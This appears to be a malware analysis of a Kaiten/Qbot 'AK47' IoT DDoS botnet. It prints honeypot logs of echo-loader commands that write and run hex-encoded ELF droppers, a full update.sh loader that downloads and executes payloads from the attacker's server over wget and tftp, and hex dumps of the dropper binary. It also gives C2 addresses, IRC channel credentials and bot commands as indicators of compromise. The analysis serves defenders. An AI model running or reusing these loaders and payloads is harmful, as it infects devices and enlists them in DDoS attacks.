2020-05-21|14:38:25|196.53 .114.199| CMD: echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x2a\x00\x01\x00\x00\x00\x1c\x03\x40\x00\x34\x00\x00\x00\xf0\x03\x00\x00\x16\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\xd0\x03\x00\x00\xd0\x03\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\xd0\x03\x00\x00\xd0\x03\x41\x00\xd0\x03\x41\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00\x00\x00\x01\x00\x51\xe5\x74\x64\x00\x00\x00\x00\x00\x00\x00\x00' > GKMSPhsZvn
2020-05-21|14:38:25|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x5c\x65\x18\xe1\x28\x45\xe6\x2f\x1d\x44\xf3\x6e\x4b\x25\x6c\x66\x7c\x67\x5b\x27\x18\x46\x7b\x26\x63\x60\x1d\x40\x08\xd1\x63\x63\x19\x43\x63\x62\x3c\x63\x19\x26\x29\x42\x28\x43\x19\x46\x19\x42\x3b\x20\x6b\x22\x2b\x20\xe3\x6f\xf6\x6e\x0b\x00\x09\x00\x09\x00\x00\x00\xff\x00\x04\xd1\x43\x65\xe6\x2f\x01\xe4\xf3\x6e\xe3\x6f\xf6\x6e\x2b\x41\x09\x00\x09\x00\x30\x03\x40\x00\x04\xd1\x43\x65\xe6\x2f\x06\xe4\xf3\x6e\xe3\x6f\xf6\x6e\x2b\x41' >> GKMSPhsZvn
2020-05-21|14:38:25|196.53 .114.199| CMD: echo -ne '\x09\x00\x09\x00\x30\x03\x40\x00\x53\x61\x63\x67\x13\x66\x04\xd1\xe6\x2f\x43\x65\xf3\x6e\x05\xe4\xe3\x6f\xf6\x6e\x2b\x41\x09\x00\x30\x03\x40\x00\xe6\x2f\x22\x4f\x07\xd0\xf4\x7f\xf3\x6e\x42\x2e\x51\x1e\x66\xe4\x62\x1e\x03\xe5\x0b\x40\xe3\x66\x0c\x7e\xe3\x6f\x26\x4f\xf6\x6e\x0b\x00\x09\x00\x30\x03\x40\x00\x53\x61\x63\x67\x13\x66\x04\xd1\xe6\x2f\x43\x65\xf3\x6e\x04\xe4\xe3\x6f\xf6\x6e\x2b\x41\x09\x00\x30\x03\x40\x00\x53\x61\x63\x67\x13\x66\x04\xd1\xe6\x2f\x43\x65\xf3\x6e\x03\xe4\xe3\x6f\xf6\x6e\x2b\x41\x09\x00' >> GKMSPhsZvn
2020-05-21|14:38:25|196.53 .114.199| CMD: echo -ne '\x30\x03\x40\x00\xe6\x2f\x22\x4f\x07\xd0\xf4\x7f\xf3\x6e\x42\x2e\x51\x1e\x66\xe4\x62\x1e\x01\xe5\x0b\x40\xe3\x66\x0c\x7e\xe3\x6f\x26\x4f\xf6\x6e\x0b\x00\x09\x00\x30\x03\x40\x00\x86\x2f\x96\x2f\xa6\x2f\xb6\x2f\xe6\x2f\x22\x4f\x49\xd2\xb4\x7f\xb8\x7f\xf3\x6e\x20\x61\x18\x21\xfc\x8f\x01\x72\xff\x72\x46\xd0\x23\x6a\x44\xd1\x01\xe4\x06\xe6\x44\xd5\x7a\x98\x0b\x40\x18\x3a\x78\x92\x02\xe1\x77\x90\xec\x38\x76\x97\x35\xe5\x25\x0e\x72\xe6\x3f\xd0\x72\x94\x0b\x40\x11\x28\x01\x18\x3e\xd0\x3e\xd4\x6d\x95\x6d\x96\x0b\x40' >> GKMSPhsZvn
2020-05-21|14:38:25|196.53 .114.199| CMD: echo -ne '\x09\x00\x03\x6b\x3c\xd0\x02\xe4\x01\xe5\x0b\x40\x00\xe6\xff\x88\x03\x8d\x03\x69\xb3\x60\xff\x88\x02\x8b\x38\xd1\x0b\x41\x01\xe4\x37\xd0\x93\x64\x53\x95\x10\xe6\x0b\x40\xec\x35\x11\x40\x08\x8d\x03\x68\x2c\xd0\x01\xe4\x33\xd5\x0b\x40\x04\xe6\x2f\xd1\x0b\x41\x8b\x64\x28\xd0\xa3\x68\x1d\x78\x93\x64\x2f\xd5\x0b\x40\x83\x66\x80\x30\x02\x89\x29\xd1\x0b\x41\x03\xe4\x00\xe8\x3e\x9a\x93\x64\x2a\xd0\x01\xe6\xec\x3a\xa3\x65\x0b\x40\x18\x48\x01\x88\x03\x8d\x04\xe4\x22\xd1\x0b\x41\x09\x00\xa0\x61\x1b\x28\x24\xd1\x10\x38' >> GKMSPhsZvn
2020-05-21|14:38:25|196.53 .114.199| CMD: echo -ne '\xec\x8b\x22\xd0\x93\x64\x22\x96\x16\xda\x0b\x40\xe3\x65\x15\x40\xe3\x65\x03\x66\x04\x8f\xb3\x64\x0b\x4a\x09\x00\xf1\xaf\x09\x00\x1c\xd8\x0b\x48\x93\x64\x0b\x48\xb3\x64\x1b\xd5\x04\xe6\x0b\x4a\x01\xe4\x12\xd1\x0b\x41\x05\xe4\x48\x7e\x4c\x7e\xe3\x6f\x26\x4f\xf6\x6e\xf6\x6b\xf6\x6a\xf6\x69\xf6\x68\x0b\x00\x09\x00\x80\x00\x00\x50\x82\x00\xc7\x00\xc4\x00\x41\x02\xff\x01\x93\x00\x09\x00\x80\x03\x40\x00\x4c\x01\x40\x00\x84\x03\x40\x00\x94\x00\x40\x00\x08\x01\x40\x00\x8c\x03\x40\x00\x84\x01\x40\x00\xd8\x00\x40\x00' >> GKMSPhsZvn
2020-05-21|14:38:25|196.53 .114.199| CMD: echo -ne '\x24\x01\x40\x00\x98\x03\x40\x00\xa0\x03\x40\x00\x68\x01\x40\x00\x0a\x0d\x0a\x0d\xf0\x00\x40\x00\xc8\x03\x40\x00\x03\xd1\xe6\x2f\xf3\x6e\xe3\x6f\xf6\x6e\x2b\x41\x09\x00\x09\x00\xac\x01\x40\x00\x86\x2f\x43\x63\xe6\x2f\x53\x64\x22\x4f\x63\x65\xf3\x6e\x73\x66\xe4\x50\xe3\x57\xe5\x51\x16\xc3\x82\xe1\x16\x30\x06\x8f\x03\x68\x05\xd0\x0b\x40\x09\x00\x8b\x61\x12\x20\xff\xe0\xe3\x6f\x26\x4f\xf6\x6e\xf6\x68\x0b\x00\x09\x00\x6c\x03\x40\x00\x03\xd0\xe6\x2f\xf3\x6e\xe3\x6f\xf6\x6e\x0b\x00\x09\x00\x09\x00\xd0\x03\x41\x00' >> GKMSPhsZvn
2020-05-21|14:38:25|196.53 .114.199| CMD: echo -ne '\x73\x68\x34\x00\x4d\x49\x52\x41\x49\x0a\x00\x00\x6b\x4a\x7a\x62\x48\x47\x62\x55\x45\x46\x00\x00\x4e\x49\x46\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x62\x69\x6e\x73\x2f\x69\x67\x4c\x48\x76\x69\x6a\x7a\x62\x46\x73\x68\x34\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x00\x00\x46\x49\x4e\x0a\x00\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:25|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x94\x00\x40\x00\x94\x00\x00\x00\xec\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\x80\x03\x40\x00\x80\x03\x00\x00\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\xd0\x03\x41\x00\xd0\x03\x00\x00\x08\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:26|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x03\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:26|196.53 .114.199| CMD: chmod 777 GKMSPhsZvn||busybox chmod 777 GKMSPhsZvn
2020-05-21|14:38:26|196.53 .114.199| CMD: ./GKMSPhsZvn
2020-05-21|14:38:29|196.53 .114.199| CMD: rm -rf ./GKMSPhsZvn
2020-05-21|14:38:29|196.53 .114.199| CMD: ./kJzbHGbUEF
2020-05-21|14:38:30|196.53 .114.199| CMD: rm -rf ./kJzbHGbUEF
2020-05-21|14:38:30|196.53 .114.199| CMD: echo -ne '\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x01\x00\x01\x03\x68\x00\x00\x00\x34\x00\x00\x04\x40\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x05\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x04\x20\x00\x00\x04\x20\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\x04\x20\x00\x02\x04\x20\x00\x02\x04\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x01\x00\x00\x64\x74\xe5\x51\x00\x00\x00\x00\x00\x00\x00\x00' > GKMSPhsZvn
2020-05-21|14:38:30|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x96\x0a\xe0\xff\x91\x2a\x20\x18\x92\x0a\x60\xff\x94\x0a\xa0\xff\x93\x2a\x60\x10\x95\x2a\xa0\x08\x90\x12\x00\x09\x90\x12\x00\x0b\x81\xc3\xe0\x08\x90\x12\x80\x08\x92\x10\x00\x08\x90\x10\x20\x01\x82\x13\xc0\x00\x10\x80\x00\xac\x01\x00\x00\x00\x01\x00\x00\x00\x92\x10\x00\x08\x90\x10\x20\x06\x82\x13\xc0\x00\x10\x80\x00\xa6\x01\x00\x00\x00\x01\x00\x00\x00\x82\x10\x00\x09\x96\x10\x00\x0a\x92\x10\x00\x08\x94\x10\x00\x01\x90\x10\x20\x05' >> GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: echo -ne '\x82\x13\xc0\x00\x10\x80\x00\x9d\x01\x00\x00\x00\x01\x00\x00\x00\x9d\xe3\xbf\x88\x92\x10\x20\x03\xf0\x27\xbf\xec\xf2\x27\xbf\xf0\xf4\x27\xbf\xf4\x94\x07\xbf\xec\x40\x00\x00\x94\x90\x10\x20\xce\x81\xc7\xe0\x08\x91\xe8\x00\x08\x82\x10\x00\x09\x96\x10\x00\x0a\x92\x10\x00\x08\x94\x10\x00\x01\x90\x10\x20\x04\x82\x13\xc0\x00\x10\x80\x00\x8a\x01\x00\x00\x00\x01\x00\x00\x00\x82\x10\x00\x09\x96\x10\x00\x0a\x92\x10\x00\x08\x94\x10\x00\x01\x90\x10\x20\x03\x82\x13\xc0\x00\x10\x80\x00\x81\x01\x00\x00\x00\x01\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: echo -ne '\x9d\xe3\xbf\x88\x92\x10\x20\x01\xf0\x27\xbf\xec\xf2\x27\xbf\xf0\xf4\x27\xbf\xf4\x94\x07\xbf\xec\x40\x00\x00\x78\x90\x10\x20\xce\x81\xc7\xe0\x08\x91\xe8\x00\x08\x9d\xe3\xbf\x00\x03\x00\x00\x40\xa0\x10\x63\xc8\xc2\x4c\x00\x00\x80\xa0\x60\x00\x32\xbf\xff\xfe\xa0\x04\x20\x01\x03\x00\x00\x40\x82\x10\x63\xc8\x94\x10\x20\x06\xa6\x24\x00\x01\x90\x10\x20\x01\x13\x00\x00\x40\x7f\xff\xff\xd7\x92\x12\x63\xd0\x82\x10\x20\x02\xc2\x37\xbf\xe4\x82\x10\x20\x50\x96\x10\x20\xc7\xc2\x37\xbf\xe6\x92\x10\x20\x35\x94\x10\x20\x72' >> GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: echo -ne '\x7f\xff\xff\xa5\x90\x10\x20\xc4\x92\x10\x26\x01\xd0\x27\xbf\xe8\x94\x10\x21\xff\x11\x00\x00\x40\x7f\xff\xff\xb5\x90\x12\x23\xd8\x92\x10\x20\x01\xa4\x10\x00\x08\x94\x10\x20\x00\x7f\xff\xff\xd5\x90\x10\x20\x02\x80\xa2\x3f\xff\x02\x80\x00\x05\xa2\x10\x00\x08\x80\xa4\xbf\xff\x12\x80\x00\x05\x90\x10\x00\x11\x7f\xff\xff\x9c\x90\x10\x20\x01\x90\x10\x00\x11\x92\x07\xbf\xe4\x7f\xff\xff\xad\x94\x10\x20\x10\xa0\x92\x20\x00\x36\x80\x00\x0a\xa0\x04\xe0\x1d\x90\x10\x20\x01\x13\x00\x00\x40\x94\x10\x20\x04\x7f\xff\xff\xaf' >> GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: echo -ne '\x92\x12\x63\xe8\x7f\xff\xff\x8e\x90\x20\x00\x10\xa0\x04\xe0\x1d\x90\x10\x00\x11\x13\x00\x00\x40\x94\x10\x00\x10\x7f\xff\xff\xa7\x92\x12\x63\xf0\x80\xa2\x00\x10\x02\x80\x00\x05\xa0\x10\x20\x00\x7f\xff\xff\x83\x90\x10\x20\x03\xa0\x10\x20\x00\x92\x07\xbf\xf7\x94\x10\x20\x01\x7f\xff\xff\xa6\x90\x10\x00\x11\x80\xa2\x20\x01\x02\x80\x00\x05\xc2\x4f\xbf\xf7\x7f\xff\xff\x79\x90\x10\x20\x04\xc2\x4f\xbf\xf7\x85\x2c\x20\x08\xa0\x10\x80\x01\x03\x03\x42\x83\x82\x10\x61\x0a\x80\xa4\x00\x01\x12\xbf\xff\xf2\x92\x07\xbf\xf7' >> GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: echo -ne '\xa0\x07\xbf\x64\x90\x10\x00\x11\x92\x10\x00\x10\x7f\xff\xff\x94\x94\x10\x20\x80\x80\xa2\x20\x00\x04\x80\x00\x07\x94\x10\x00\x08\x92\x10\x00\x10\x7f\xff\xff\x85\x90\x10\x00\x12\x10\xbf\xff\xf6\xa0\x07\xbf\x64\x7f\xff\xff\x68\x90\x10\x00\x11\x7f\xff\xff\x66\x90\x10\x00\x12\x94\x10\x20\x04\x90\x10\x20\x01\x13\x00\x00\x41\x7f\xff\xff\x7a\x92\x12\x60\x18\x7f\xff\xff\x59\x90\x10\x20\x05\x81\xc7\xe0\x08\x81\xe8\x00\x00\x82\x13\xc0\x00\x10\xbf\xff\x8f\x01\x00\x00\x00\x01\x00\x00\x00\x82\x10\x00\x08\x90\x10\x00\x09' >> GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: echo -ne '\x92\x10\x00\x0a\x94\x10\x00\x0b\x96\x10\x00\x0c\x98\x10\x00\x0d\x91\xd0\x20\x10\x0a\x80\x00\x04\x01\x00\x00\x00\x81\xc3\xe0\x08\x01\x00\x00\x00\x9d\xe3\xbf\x98\x40\x00\x00\x05\x01\x00\x00\x00\xf0\x22\x00\x00\x81\xc7\xe0\x08\x91\xe8\x3f\xff\x11\x00\x00\x81\x81\xc3\xe0\x08\x90\x12\x20\x20\x73\x70\x63\x00\x00\x00\x00\x00\x4d\x49\x52\x41\x49\x0a\x00\x00\x6b\x4a\x7a\x62\x48\x47\x62\x55\x45\x46\x00\x00\x00\x00\x00\x00\x4e\x49\x46\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x62\x69\x6e\x73\x2f\x69\x67\x4c\x48\x76\x69' >> GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: echo -ne '\x6a\x7a\x62\x46\x73\x70\x63\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x00\x00\x46\x49\x4e\x0a\x00\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x01\x00\x94\x00\x00\x00\x94\x00\x00\x03\x34' >> GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x01\x03\xc8\x00\x00\x03\xc8\x00\x00\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x00\x02\x04\x20\x00\x00\x04\x20\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x20\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x01\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: chmod 777 GKMSPhsZvn||busybox chmod 777 GKMSPhsZvn
2020-05-21|14:38:31|196.53 .114.199| CMD: ./GKMSPhsZvn
2020-05-21|14:38:34|196.53 .114.199| CMD: rm -rf ./GKMSPhsZvn
2020-05-21|14:38:34|196.53 .114.199| CMD: ./kJzbHGbUEF
2020-05-21|14:38:35|196.53 .114.199| CMD: rm -rf ./kJzbHGbUEF

Loders are (1) Script loader (update.sh) & (2) Echo loader (pushed hexstrings multiple cpu architectures)

The script loader contains below code:

          (inside the update.sh)

#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget hxxp://196[.]53[.]114[.]199/igLHvijzbFmips -O igLHvijzbFmips; busybox wget hxxp://196[.]53[.]114[.]199/igLHvijzbFmips -O igLHvijzbFmips; tftp -r igLHvijzbFmips -g 196[.]53[.]114[.]199; busybox tftp -r igLHvijzbFmips -g 196[.]53[.]114[.]199; chmod 777 igLHvijzbFmips; ./igLHvijzbFmips; rm -rf igLHvijzbFmips
wget hxxp://196[.]53[.]114[.]199/igLHvijzbFmpsl -O igLHvijzbFmpsl; busybox wget hxxp://196[.]53[.]114[.]199/igLHvijzbFmpsl -O igLHvijzbFmpsl; tftp -r igLHvijzbFmpsl -g 196[.]53[.]114[.]199; busybox tftp -r igLHvijzbFmpsl -g 196[.]53[.]114[.]199; chmod 777 igLHvijzbFmpsl; ./igLHvijzbFmpsl; rm -rf igLHvijzbFmpsl
wget hxxp://196[.]53[.]114[.]199/igLHvijzbFsh4 -O igLHvijzbFsh4; busybox wget hxxp://196[.]53[.]114[.]199/igLHvijzbFsh4 -O igLHvijzbFsh4; tftp -r igLHvijzbFsh4 -g 196[.]53[.]114[.]199; busybox tftp -r igLHvijzbFsh4 -g 196[.]53[.]114[.]199; chmod 777 igLHvijzbFsh4; ./igLHvijzbFsh4; rm -rf igLHvijzbFsh4
wget hxxp://196[.]53[.]114[.]199/igLHvijzbFx86 -O igLHvijzbFx86; busybox wget hxxp://196[.]53[.]114[.]199/igLHvijzbFx86 -O igLHvijzbFx86; tftp -r igLHvijzbFx86 -g 196[.]53[.]114[.]199; busybox tftp -r igLHvijzbFx86 -g 196[.]53[.]114[.]199; chmod 777 igLHvijzbFx86; ./igLHvijzbFx86; rm -rf igLHvijzbFx86
wget hxxp://196[.]53[.]114[.]199/igLHvijzbFarm6 -O igLHvijzbFarm6; busybox wget hxxp://196[.]53[.]114[.]199/igLHvijzbFarm6 -O igLHvijzbFarm6; tftp -r igLHvijzbFarm6 -g 196[.]53[.]114[.]199; busybox tftp -r igLHvijzbFarm6 -g 196[.]53[.]114[.]199; chmod 777 igLHvijzbFarm6; ./igLHvijzbFarm6; rm -rf igLHvijzbFarm6
wget hxxp://196[.]53[.]114[.]199/whatev -O whatev; busybox wget hxxp://196[.]53[.]114[.]199/whatev -O whatev; tftp -r whatev -g 196[.]53[.]114[.]199; busybox tftp -r whatev -g 196[.]53[.]114[.]199; chmod 777 whatev; ./whatev; rm -rf whatev
wget hxxp://196[.]53[.]114[.]199/igLHvijzbFppc -O igLHvijzbFppc; busybox wget hxxp://196[.]53[.]114[.]199/igLHvijzbFppc -O igLHvijzbFppc; tftp -r igLHvijzbFppc -g 196[.]53[.]114[.]199; busybox tftp -r igLHvijzbFppc -g 196[.]53[.]114[.]199; chmod 777 igLHvijzbFppc; ./igLHvijzbFppc; rm -rf igLHvijzbFppc
wget hxxp://196[.]53[.]114[.]199/ftp -O ftp; busybox wget hxxp://196[.]53[.]114[.]199/ftp -O ftp; tftp -r ftp -g 196[.]53[.]114[.]199; busybox tftp -r ftp -g 196[.]53[.]114[.]199; chmod 777 ftp; ./ftp; rm -rf ftp
wget hxxp://196[.]53[.]114[.]199/igLHvijzbFm68k -O igLHvijzbFm68k; busybox wget hxxp://196[.]53[.]114[.]199/igLHvijzbFm68k -O igLHvijzbFm68k; tftp -r igLHvijzbFm68k -g 196[.]53[.]114[.]199; busybox tftp -r igLHvijzbFm68k -g 196[.]53[.]114[.]199; chmod 777 igLHvijzbFm68k; ./igLHvijzbFm68k; rm -rf igLHvijzbFm68k
wget hxxp://196[.]53[.]114[.]199/igLHvijzbFspc -O igLHvijzbFspc; busybox wget hxxp://196[.]53[.]114[.]199/igLHvijzbFspc -O igLHvijzbFspc; tftp -r igLHvijzbFspc -g 196[.]53[.]114[.]199; busybox tftp -r igLHvijzbFspc -g 196[.]53[.]114[.]199; chmod 777 igLHvijzbFspc; ./igLHvijzbFspc; rm -rf igLHvijzbFspc
wget hxxp://196[.]53[.]114[.]199/igLHvijzbFarm -O igLHvijzbFarm; busybox wget hxxp://196[.]53[.]114[.]199/igLHvijzbFarm -O igLHvijzbFarm; tftp -r igLHvijzbFarm -g 196[.]53[.]114[.]199; busybox tftp -r igLHvijzbFarm -g 196[.]53[.]114[.]199; chmod 777 igLHvijzbFarm; ./igLHvijzbFarm; rm -rf igLHvijzbFarm
wget hxxp://196[.]53[.]114[.]199/igLHvijzbFarm5 -O igLHvijzbFarm5; busybox wget hxxp://196[.]53[.]114[.]199/igLHvijzbFarm5 -O igLHvijzbFarm5; tftp -r igLHvijzbFarm5 -g 196[.]53[.]114[.]199; busybox tftp -r igLHvijzbFarm5 -g 196[.]53[.]114[.]199; chmod 777 igLHvijzbFarm5; ./igLHvijzbFarm5; rm -rf igLHvijzbFarm5
wget hxxp://196[.]53[.]114[.]199/mirai -O mirai; busybox wget hxxp://196[.]53[.]114[.]199/mirai -O mirai; tftp -r mirai -g 196[.]53[.]114[.]199; busybox tftp -r mirai -g 196[.]53[.]114[.]199; chmod 777 mirai; ./mirai; rm -rf mirai

The echo-loader pushed-hexstrings has been analyzed to have the same payload-C2 as the script loader:

         (same location with the pushed hex strings)

// I use this sparc ELF (to test new ver radare2 also)

7f454c46010201000000000000000000000200020000000100010368000000340000044000000000003400200003002800050004000000010000000000010000000100000000042000000420000000050001000000000001000004200002042000020420000000000000000800000006000100006474e5510000000000000000
0000000000000000000000000000000600000004960ae0ff912a2018920a60ff940aa0ff932a6010952aa008901200099012000b81c3e0089012800892100008901020018213c000108000ac010000000100000092100008901020068213c000108000a60100000001000000821000099610000a921000089410000190102005
8213c0001080009d01000000010000009de3bf8892102003f027bfecf227bff0f427bff49407bfec40000094901020ce81c7e00891e80008821000099610000a9210000894100001901020048213c0001080008a0100000001000000821000099610000a9210000894100001901020038213c000108000810100000001000000
9de3bf8892102001f027bfecf227bff0f427bff49407bfec40000078901020ce81c7e00891e800089de3bf0003000040a01063c8c24c000080a0600032bffffea004200103000040821063c894102006a624000190102001130000407fffffd7921263d082102002c237bfe482102050961020c7c237bfe69210203594102072
7fffffa5901020c492102601d027bfe8941021ff110000407fffffb5901223d892102001a4100008941020007fffffd59010200280a23fff02800005a210000880a4bfff12800005901000117fffff9c90102001901000119207bfe47fffffad94102010a09220003680000aa004e01d9010200113000040941020047fffffaf
921263e87fffff8e90200010a004e01d9010001113000040941000107fffffa7921263f080a2001002800005a01020007fffff8390102003a01020009207bff7941020017fffffa69010001180a2200102800005c24fbff77fffff7990102004c24fbff7852c2008a0108001030342838210610a80a4000112bffff29207bff7
a007bf6490100011921000107fffff949410208080a220000480000794100008921000107fffff859010001210bffff6a007bf647fffff68901000117fffff66901000129410200490102001130000417fffff7a921260187fffff599010200581c7e00881e800008213c00010bfff8f01000000010000008210000890100009
9210000a9410000b9610000c9810000d91d020100a8000040100000081c3e008010000009de3bf984000000501000000f022000081c7e00891e83fff1100008181c3e0089012202073706300000000004d495241490a00006b4a7a624847625545460000000000004e49460a00000000474554202f62696e732f69674c487669
6a7a624673706320485454502f312e300d0a0d0a0000000046494e0a00000000002e7368737472746162002e74657874002e726f64617461002e627373000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b0000000100000006000100940000009400000334
00000000000000000000000400000000000000110000000100000032000103c8000003c800000058000000000000000000000008000000010000001900000008000000030002042000000420000000080000000000000000000000040000000000000001000000030000000000000000000004200000001e0000000000000000
0000000100000000

// it was coded something like this↓ to simplify, other err_trapping are omitted, 
// & see reversing video at https://twitter.com/malwaremustd1e/status/1255139670985302016

#define C2_IP utils_inet_addr(196, 53, 114, 199 // c2 ip forming; 
struct sockaddr_in C2; C2.sin_family = AF_INET; //2 
C2.sin_port = HTONS(80); C2.sin_addr.s_addr = C2_IP; // ip of c2
file_fd = xopen("kJzbHGbUEF", 577, 571"); socket_fd~xsocket(2, 1, 0); 
 if ((retcode = connect(sock_fd, &C2, 16))) < 0) {xwrite(1, "NIF\n", 4);; exit(retcode);}
 else {write(sfd, "GET /bins/igLHvijzbFx86 HTTP/1.0\r\n\r\"", 16)
xwrite(1, "FIN\n", 4); exit(5);

Malware & threat information (for IOC)

Definition and Infrastructure

The summary of the threat source and infrastructure information as follows:

          (IoT malware bot "Kaiten AK-47 by Freak"'s client and threat/infrastructure information)

MAL-ID-1         : KAITEN ”AK47" MOD-TELNET SCANNER - IRC BASE LINUX DDOS BACKDOOR
MAL-ID-2         : Kaiten ZiggyStartux Qbot Redo by Freak version 18.0.0
Loader Server    : aka "AK47" server: 196.53.114.199:8080  
Payload  Server  : 196.53. 114.199:80
C2 server        : 204.11. 49.132:80 (download), (204.11.49. 132:6667) IRC service
C2 data          : chan = "#donks" ; key = "swagfag";
Botmasters nick  :  Freak, Leonidus, Crypto, error401, lmfao, dmt,
                    ni**er, DeTH, Okami, nightd0g, phpbot, netspot1-10
Initial traffic  :   NICK [%s|%s]%s\nUSER %s localhost localhost :%s\n", "KEK")
Original source  : bot.c
Compiler         : GCC: (GNU) 4.1.2

The malware analysis information in general information:

This part contains the following details:

1. Bot commands,
2. Hardcoded msgs structure that triggers other activities,
3. Pushed Command Execution,
4. DDoS attack types
5. Telnet Scanner AK-47 scanner command
6. IoT credentials aimed
7. HTTP header for the downloader
8. HTTP user-agents used for DDoS
9. IRC bot messages (hardcoded) that can be used for signature

          (bot commands)

 GETIP                  // GETIP <iface>          // get eth IP address
 NICK                   // NICK <nick>            // call a handle
 DISABLE                // DISABLE <pass>         // disable flood w password
 ENABLE                 // ENABLE <pass>          // enable flood w password
 GET                    // GET <host> <save as>   // get HTTP request
 VERSION                // version request        // Kaiten ZiggyStartux Qbot Redo by Freak version 18.0.0
 CLEARHISTORY           // self-explanatory, commands: history -c;history -w ;; cd /root;rm -f .bash_history ;; cd /var/tmp; rm -f *
 RNDNICK                // get random nicknames
 SERVER                 // change, connect to server
 KILLMYEYEPEEUSINGHOIC  // KIlling all this bot
 KILLALL                // Killing all bot processes
 MOVE                   // MOVE <server>

         (this mod-kaiten's struct Messages / msg[] to activate its functions)

 352()       // void (unused)
 433()       // free(nick); nick=makestring();
 _NICK       // nick=strdup(sendernick_str);
 _PING       // Send "PONG" <sender>
 _PRIVMSG    // parsing pished exec commands (see next section)
 376(int fd) // initially run, MODE <botnick> -xi; JOIN <chan>; WHOIS <nick>
             //  if not telnet-scanning  then activating ak47scan(fd)


          (pushed code exec commands)

 IRC                    // send msg "NOTICE %s :Unable to comply.\n"
 SH                     // file exec via "export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s" 
 SHD                    // cmd exec via sh -c => export HOME=/tmp;export;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;trap '' 1 2; sh -c '%s
